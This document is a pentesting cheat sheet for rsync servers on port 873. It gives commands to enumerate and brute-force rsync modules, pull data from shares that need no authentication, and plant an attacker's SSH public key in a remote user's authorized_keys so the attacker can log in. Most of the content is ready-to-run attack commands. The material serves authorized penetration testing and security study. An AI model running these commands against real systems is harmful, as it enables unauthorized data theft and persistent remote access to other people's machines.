# Rsync Pentesting

Rsync is utility for efficiently transferring and synchronizing files between a computer and a storage drive and across networked computers by comparing the modification times and sizes of files. A default port is 873.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
nmap --script rsync-list-modules -p 873 <target-ip>
nmap --script rsync-brute --script-args 'rsync-brute.module=www' <target-ip>

# Banner grabbing and list shared folders
# We can execute commands (modules) that we found, after entering '@RSYNCD: <version>'.
nc -nv <target-ip> 873
@RSYNCD: 31.0
#list
raidroot
Conf
@RSYNCD: EXIT

# List sync data using rsync
rsync <target-ip>::
rsync -av --list-only rsync://<target-ip>

# List sync data using Metasploit
msf> use auxiliary/scanner/rsync/modules_list
```

When we found the shared folder, check if we can connect without authentication.\
Assume that we found the “shares” folder.

```shellscript
# Netcat
nc -nv <target-ip> 873
RSYNCD: 31.0
shares
RSYNCD: OK

# Rsync
rsync <target-ip>::shares
rsync -av --list-only rsync://<target-ip>:873/shares
```

#### Check Config File <a href="#check-config-file" id="check-config-file"></a>

```shellscript
find / -name "rsyncd.conf" 2>/dev/null
cat /path/to/rsyncd.conf
```

### Sync Data <a href="#sync-data" id="sync-data"></a>

After gathering modules (shared folders), we can sync it with our local folder.

#### From Remote to Local <a href="#from-remote-to-local" id="from-remote-to-local"></a>

We can sync a remote folder with a local folder.

```
# -a: Arvhice
# -v: Verbose
rsync -av <remote-ip>::<src_dir> <dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
mkdir test_shared
rsync -av <remote-ip>::share test_shared
rsync -av rsync://<remote-ip>:873/share test_shared
```

If we want to update sync data, modify files in the shared folder then rsync back with “From Local to Remote”.

#### From Local to Remote <a href="#from-local-to-remote" id="from-local-to-remote"></a>

We can sync our local folder with a remote folder.

```
# -a: Arvhice
# -v: Verbose
rsync -av <src_dir> <remote-ip>::<dest_dir>

# e.g. Assume we found the "share" folder with rsync enumeration.
rsync -av test_shared <remote-ip>::share
rsync -av test_shared rsync://<remote-ip>:873/share
```

### SSH Key Syncing and SSH Login <a href="#ssh-key-syncing-and-ssh-login" id="ssh-key-syncing-and-ssh-login"></a>

#### 1. Generate a SSH key in local machine <a href="#id-1-generate-a-ssh-key-in-local-machine" id="id-1-generate-a-ssh-key-in-local-machine"></a>

Copy the content of the public key to the authorized\_keys.

```
ssh-keygen -f testkey
cat testkey.pub > authorized_keys
```

#### 2. Sync the authorized\_keys with the remote .ssh directory <a href="#id-2-sync-the-authorized_keys-with-the-remote-ssh-directory" id="id-2-sync-the-authorized_keys-with-the-remote-ssh-directory"></a>

```
rsync authorized_keys rsync://<remote-user>@<remote-ip>:873/<home_user>/.ssh
```

#### 3. SSH login with the generated private key <a href="#id-3-ssh-login-with-the-generated-private-key" id="id-3-ssh-login-with-the-generated-private-key"></a>

```
ssh <remote-home-user>@<remote-ip> -i testkey
```

### References <a href="#references" id="references"></a>

* [Linuxize](https://linuxize.com/post/how-to-use-rsync-for-local-and-remote-data-transfer-and-synchronization/)